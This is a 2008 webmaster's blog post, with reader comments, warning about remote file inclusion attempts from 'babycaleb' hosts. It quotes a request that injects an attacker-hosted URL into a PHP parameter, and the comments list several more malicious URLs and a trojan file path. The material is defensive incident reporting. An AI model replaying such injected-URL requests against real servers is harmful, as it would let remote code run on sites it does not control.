Nov 8, 2008

babycaleb.fortunecity.co.uk hacker now shut down.

Am getting a lot of these request lately

/shop/catalog/product_info.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm

They are from lots of IPS all trying to remote load this page. Inside that page is a hack atempt. AVG gives an alarm if you try to view the source.

Do not go to the website babycaleb.fortunecity.co.uk AVG detects a virus but it still gets into your system. Look for ..
c:\windows\system32\tools\regexe.exe
a trojan horse downloader.generic8.cox

--updated-
The site has now been shutdown.

A search of google
http://www.google.com/search?q=babycaleb.fortunecity.co.uk shows that sites all over the net are infected with this atack and they are allowing the atack to spread. Perhaps they are involved in the atack?

9 comments:

Anonymous said...

I am admin for cooking.com we have been under attack with this babycaleb.fortunecity.co.uk for three days now. Wish Fortunecity would get off their asses and kill it.

Anonymous said...

I have had around three dozen hacking attempts per week from babycaleb since he set up on fortunecity.

FortuneCity support will not take action.

This is the third hosting company he has worked through (since I have been aware of him) the first two companies actually shut him down. FortuneCity seems unwilling to help.

Anonymous said...

As webmaster of several websites, I've noticed attacks attempts from many babycaleb websites, their number's increasing with time.

Amongst them I've recently noticed :
http://babycaleb.fortunecity.co.uk (even today)
http://calebsbirth.fortunecity.co.uk/
http://babycaleb.mvhosted.com
http://mybabycaleb.chat.ru

What a plea !

Anonymous said...

It was active on Nov 23

Anonymous said...

I can show at least 65 examples of times this URL hack has been passed to my website(s).

Anonymous said...

There are many more.... even with no "babycaleb" in the querystring but on the page, for example:

http://myfamily.yoll.net/index.htm


It is very annoying!

tmaster said...

Parsing input: http://myfamily.yoll.net/index.htm
Host myfamily.yoll.net (checking ip) = 216.65.1.200
host 216.65.1.200 (getting name) = fateback.com.
Routing details for 216.65.1.200
Report routing for 216.65.1.200: abuse@dedicatedhosting.com, abuse@interland.com

Kenneth said...

What I can't understand is why this hacker can't show some nice ladies instead of his ugly bad looking gal :p

Anonymous said...

Not sure whether its the same but I have a search cloud on my site that has picked up this fortune city query nad another failry soon after with similar intent.


http://beerincooler.chat.ru/image.jpg

IP:58.0.158.143

SYSTEM: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

Date,Time: Thu 25th Mar,2010 08:53 am

until Thu 25th Mar,2010 08:57 am 30 times.